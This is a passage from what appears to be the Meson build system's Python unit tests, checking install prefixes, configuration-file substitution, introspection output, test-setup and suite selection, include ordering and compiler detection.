raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
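# Drop the file extension and any 'lib'/'cyg' prefix so the result matches the Meson target name.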
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats(confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result)
confdata = ConfigurationData()
# Key error as they do not exist
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False, 'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True, 'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value', 'description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10, 'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value', 'description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value')
# Check that malformed input raises MesonException
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@')
# List value in confdata
confdata.values = {'VAR': (['value'], 'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir works. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
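# Target order in the introspection output is not guaranteed; make sure the static library entry comes first.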
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_force_fallback_for(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--force-fallback-for=zlib,foo'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run the buggy test with a setup whose env makes it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run the buggy test with a setup that has no env; it will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Running tests without --setup causes the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests explicitly using the same setup that is set as the default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
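# The test runner is expected to exit with a return code equal to the number of failed tests.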
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])
self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])
def test_build_by_default(self):
testdir = os.path.join(self.common_test_dir, '133 build by default')
self.init(testdir)
self.build()
genfile1 = os.path.join(self.builddir, 'generated1.dat')
genfile2 = os.path.join(self.builddir, 'generated2.dat')
exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
self.assertPathExists(genfile1)
self.assertPathExists(genfile2)
self.assertPathDoesNotExist(exe1)
self.assertPathDoesNotExist(exe2)
self.build(target=('fooprog' + exe_suffix))
self.assertPathExists(exe1)
self.build(target=('barprog' + exe_suffix))
self.assertPathExists(exe2)
def test_internal_include_order(self):
if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')
testdir = os.path.join(self.common_test_dir, '134 include order')
self.init(testdir)
execmd = fxecmd = None
for cmd in self.get_compdb():
if 'someexe' in cmd['command']:
execmd = cmd['command']
continue
if 'somefxe' in cmd['command']:
fxecmd = cmd['command']
continue
if not execmd or not fxecmd:
raise Exception('Could not find someexe and somefxe commands')
# Check include order for 'someexe'
incs = [a for a in split_args(execmd) if a.startswith("-I")]
self.assertEqual(len(incs), 9)
# Need to run the build so the private dir is created.
self.build()
pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], "-I" + privdir)
# target build subdir
self.assertPathEqual(incs[1], "-Isub4")
# target source subdir
self.assertPathBasenameEqual(incs[2], 'sub4')
# include paths added via per-target c_args: ['-I'...]
self.assertPathBasenameEqual(incs[3], 'sub3')
# target include_directories: build dir
self.assertPathEqual(incs[4], "-Isub2")
# target include_directories: source dir
self.assertPathBasenameEqual(incs[5], 'sub2')
# target internal dependency include_directories: build dir
self.assertPathEqual(incs[6], "-Isub1")
# target internal dependency include_directories: source dir
self.assertPathBasenameEqual(incs[7], 'sub1')
# custom target include dir
self.assertPathEqual(incs[8], '-Ictsub')
# Check include order for 'somefxe'
incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
self.assertEqual(len(incs), 9)
# target private dir
pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
self.assertEqual(len(pdirs), 1)
privdir = pdirs[0][len(self.builddir)+1:]
self.assertPathEqual(incs[0], '-I' + privdir)
# target build dir
self.assertPathEqual(incs[1], '-I.')
# target source dir
self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
# target internal dependency correct include_directories: build dir
self.assertPathEqual(incs[3], "-Isub4")
# target internal dependency correct include_directories: source dir
self.assertPathBasenameEqual(incs[4], 'sub4')
# target internal dependency dep include_directories: build dir
self.assertPathEqual(incs[5], "-Isub1")
# target internal dependency dep include_directories: source dir
self.assertPathBasenameEqual(incs[6], 'sub1')
# target internal dependency wrong include_directories: build dir
self.assertPathEqual(incs[7], "-Isub2")
# target internal dependency wrong include_directories: source dir
self.assertPathBasenameEqual(incs[8], 'sub2')
def test_compiler_detection(self):
'''
Test that automatic compiler detection and setting from the environment
both work just fine. This is needed because while running project tests
and other unit tests, we always read CC/CXX/etc from the environment.
'''
gnu = mesonbuild.compilers.GnuCompiler
clang = mesonbuild.compilers.ClangCompiler
intel = mesonbuild.compilers.IntelGnuLikeCompiler
msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
ar = mesonbuild.linkers.ArLinker
lib = mesonbuild.linkers.VisualStudioLinker
langs = [('c', 'CC'), ('cpp', 'CXX')]
if not is_windows() and platform.machine().lower() != 'e2k':
langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
env = get_fake_env(testdir, self.builddir, self.prefix)
for lang, evar in langs:
# Detect with evar and do sanity checks on that
if evar in os.environ:
ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(ecc.version)
elinker = env.detect_static_linker(ecc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop(evar)
# Very rough/strict heuristics. Would never work for actual
# compiler detection, but should be ok for the tests.
ebase = os.path.basename(evalue)
if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
self.assertIsInstance(ecc, gnu)
self.assertIsInstance(elinker, ar)
elif 'clang-cl' in ebase:
self.assertIsInstance(ecc, clangcl)
self.assertIsInstance(elinker, lib)
elif 'clang' in ebase:
self.assertIsInstance(ecc, clang)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('ic'):
self.assertIsInstance(ecc, intel)
self.assertIsInstance(elinker, ar)
elif ebase.startswith('cl'):
self.assertIsInstance(ecc, msvc)
self.assertIsInstance(elinker, lib)
else:
raise AssertionError('Unknown compiler {!r}'.format(evalue))
# Check that we actually used the evalue correctly as the compiler
self.assertEqual(ecc.get_exelist(), split_args(evalue))
# Do auto-detection of compiler based on platform, PATH, etc.
cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
self.assertTrue(cc.version)
linker = env.detect_static_linker(cc)
# Check compiler type
if isinstance(cc, gnu):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_sunos():
self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, clangcl):
self.assertIsInstance(linker, lib)
self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
if isinstance(cc, clang):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
# This is clang, not clang-cl
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
if isinstance(cc, intel):
self.assertIsInstance(linker, ar)
if is_osx():
self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
elif is_windows():
self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
else:
self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
if isinstance(cc, msvc):
self.assertTrue(is_windows())
self.assertIsInstance(linker, lib)
self.assertEqual(cc.id, 'msvc')
self.assertTrue(hasattr(cc, 'is_64'))
self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
# If we're on Windows CI, we know what the compiler will be
if 'arch' in os.environ:
if os.environ['arch'] == 'x64':
self.assertTrue(cc.is_64)
else:
self.assertFalse(cc.is_64)
# Set evar ourselves to a wrapper script that just calls the same
# exelist + some argument. This is meant to test that setting
# something like `ccache gcc -pipe` or `distcc ccache gcc` works.
wrapper = os.path.join(testdir, 'compiler wrapper.py')
wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
wrappercc_s = ''
for w in wrappercc:
wrappercc_s += quote_arg(w) + ' '
os.environ[evar] = wrappercc_s
wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
